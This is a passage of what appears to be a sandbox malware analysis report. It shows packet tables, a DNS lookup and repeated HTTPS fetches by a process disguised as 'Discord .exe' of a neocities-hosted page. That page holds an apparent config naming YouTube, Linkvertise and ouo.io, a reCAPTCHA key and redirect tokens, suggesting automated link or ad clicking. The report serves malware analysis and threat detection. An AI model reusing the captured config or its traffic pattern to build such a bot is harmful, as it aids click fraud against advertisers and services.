Nov 4, 2022 20:00:04.451611042 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.453890085 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.453973055 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.453984976 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.454020977 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.454063892 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.608164072 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.608232021 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.780286074 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.780359030 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.780457020 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.781156063 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.781181097 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.829262018 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.836220980 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.836268902 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.838378906 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.838493109 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.842212915 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.842245102 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.842386007 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.842396021 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.842477083 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.879812956 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.879865885 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.879954100 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.879990101 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.880009890 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.880040884 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.901379108 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.901429892 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.901483059 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.901571035 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.901599884 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.901617050 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.901618004 CET	443	49745	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.901659966 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:05.076036930 CET	49745	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:05.076097965 CET	443	49745	198.51.233.2	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2022 19:59:45.018613100 CET	56588	53	192.168.2.7	8.8.8.8
Nov 4, 2022 19:59:45.047856092 CET	53	56588	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 4, 2022 19:59:45.018613100 CET	192.168.2.7	8.8.8.8	0xb603	Standard query (0)	c1-wi.neocities.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 4, 2022 19:59:45.047856092 CET	8.8.8.8	192.168.2.7	0xb603	No error (0)	c1-wi.neocities.org		198.51.233.2	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

c1-wi.neocities.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49728	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 18:59:45 UTC	0	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 18:59:45 UTC	0	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 18:59:45 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 18:59:45 UTC	0	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 18:59:45 UTC	16	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 18:59:45 UTC	32	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49732	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 18:59:45 UTC	37	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 18:59:45 UTC	37	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 18:59:45 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 18:59:45 UTC	38	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 18:59:45 UTC	53	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 18:59:45 UTC	69	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.7	49741	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 18:59:50 UTC	377	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 18:59:50 UTC	377	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 18:59:50 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 18:59:50 UTC	377	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 18:59:50 UTC	393	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 18:59:50 UTC	409	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.7	49742	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 18:59:50 UTC	414	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 18:59:50 UTC	414	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 18:59:50 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 18:59:50 UTC	415	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 18:59:50 UTC	430	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 18:59:50 UTC	446	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.7	49743	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 19:00:03 UTC	452	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 19:00:03 UTC	452	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 19:00:03 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 19:00:03 UTC	453	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 19:00:04 UTC	468	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 